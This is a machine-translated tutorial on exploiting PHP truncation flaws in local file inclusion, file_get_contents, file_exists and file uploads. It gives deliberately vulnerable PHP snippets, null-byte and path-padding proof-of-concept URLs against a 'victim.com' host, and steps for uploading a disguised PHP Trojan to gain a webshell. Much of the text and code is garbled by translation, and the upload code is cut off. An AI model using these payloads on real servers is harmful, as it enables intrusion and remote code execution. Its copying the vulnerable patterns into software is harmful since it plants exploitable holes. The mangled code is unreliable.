Exploitation of Truncation in file inclusion and upload

Exploitation of Truncation in file inclusion and upload
Truncation may be applicable in the following situations:
Include (require)
File_get_contents
File_exists
All url parameters can be controlled by % 00 0x01. Local file inclusion

1.1 truncation type: php % 00 Truncation

Truncation condition:

Php version earlier than 5.3.4 CVE-2006-7243
Php magic_quotes_gpcOFF

Vulnerability file lfi. php

<? Php $ temp = $ _ REQUEST ['action']. ". php"; include $ temp; // include causes LFI and php % 00 truncation?>

Password File to include

Password  <?php  phpinfo();  ?> 

 

Code: lfi. php? Action = password % 00

Note: url authentic % 00 is decoded to 0x00 by url, which may lead to truncation.

The password file is successfully included and the phpinfo () function is executed.

Without truncation conditions, lfi. php can only contain files with the php extension.

Conversely, if there is a truncation condition, lfi. php can contain the extension of any file.

Whenmagic_quotes_gpcWhen the php version is still 5.2.9, test again. The result % 00 is escaped\0It has two single characters and does not have the truncation function.

The reason is: whenmagic_quotes_gpcAll '(single quotes), "(double quotation marks), \ (backslash), and NULL characters (% 00) are automatically added with a backslash to escape. Many other functions have similar functions, such as addslashes (),mysql_escape_string(),mysql_real_escape_string()And so on

Whenmagic_quotes_gpcIf the php version is still 5.3.10, it cannot be truncated. So it turns out that both the php version and gpc must be met before they can be truncated.

In addition to the above include, require, include_once, require_once and file_get_contents can also be used with php % 00.

FileGetContents. php

<?php$file = $_GET['file'].'PNG';$contents =  file_get_contents($file);file_put_contents('put.txt', $contents);?>

Method of exploits:

Http://www.victim.com/FileGetContents.php? File = password % 00

You can see that the current directory put.txt is the content in the above password.

Password<?phpphpinfo();?>

1.2 file path Truncation

In addition to the % 00 mentioned in "1.1", it can be truncated and can contain characters..Or/., Or./(Pay attention to the order )./As for why other characters cannot be used, it must be related to php implementation.

System file path length limit:

Windows 259 bytes
Linux 4096 bytes

 

Specific can see this article: http://joychou.org/index.php/Misc/filename-length-limit-on-windows-linux.html

Truncation condition:

The php version is earlier than 5.3.4 (which version is not very clear? It is obviously incorrect because I used 5.2.9 for testing because kukki wrote earlier than 5.2.8 on wooyun)
It doesn't matter if GPC is enabled

Vulnerability code lfi. php, the same as lfi. php In 1.1

<?php $temp = $_REQUEST['action'].".php"; include $temp;echo $temp;?>

In windows.POC with the least characters:

lfi.php?action=password..............................................................................................................................................................................................................................................` 

Successful inclusion. Execute the phpinfo function in the password.

 

The root directory path contains 258 bytes. So the minimum .Number
258-(the path length of the lfi. php file is C:/wamp/www/+ Strlen ('Password '))

 

Or use./Truncation. The shortest POC is and the shortest path length is 258.

lfi.php?action=password./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ 

After changing the password file name to password123, the shortest POC is, and the shortest path length is still 258

lfi.php?password123/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ 

Note that either of the two is/, and the other is. Start, which is related to the parity of the path length. In this case, a long length is lost./.And then jump to the first one./Or.You can.

Test it on your own in linux.

0x02. File Upload

Truncation type: % 00 truncation of php. Therefore, the truncation condition is still the condition for php % 00 truncation.

Php versions earlier than 5.3.4
Disable gpc

Test environment:

Php version 5.2.9
Disable gpc

Vulnerability code upload. php

<Html> <body> 
 
The vulnerability code is YY, which may not be used in actual situations. It only proves that truncation can achieve the upload function.
First, rename a PHP Trojan as an extension name to a white extension, such as .jpg
Visit: http://www.victim.com/upload.php? Jieduan = xxoo. php % 00
Click the submit button to generate an xxoo. php Trojan on the server.
0x03. file_exists determine whether the file exists
File_exists is also truncated when determining whether a file exists.
Truncation condition:
Php versions earlier than 5.3.4

GPC off status
The vulnerability code is as follows, and the vulnerability of the CVE-2014-8959 phpmyadmin.
<?php $file = $_GET['file'];$filename = $file . '.php';echo $filename . '<br>';if(! file_exists($filename)){    echo 'not exist';}else{    include_once($filename);    echo 'exist';}?>
 
When there is a shell.jpg file in the front directory, how can I access it? File1_shell.jpg % 00. The returned result is that the file exists.
TIPS:
When the fifth line of the above file becomes$filename = 'xxoo' . $file . '.php';If you still need to use shell.jpg, you only need to construct it like this:?file=/../shell.jpg%00, Use/../Return to the current directory.
Switch some directories in php
../Indicates the previous directory

./Indicates the current directory

/The current directory cannot be used separately. Only xx/is used to represent the directory xx.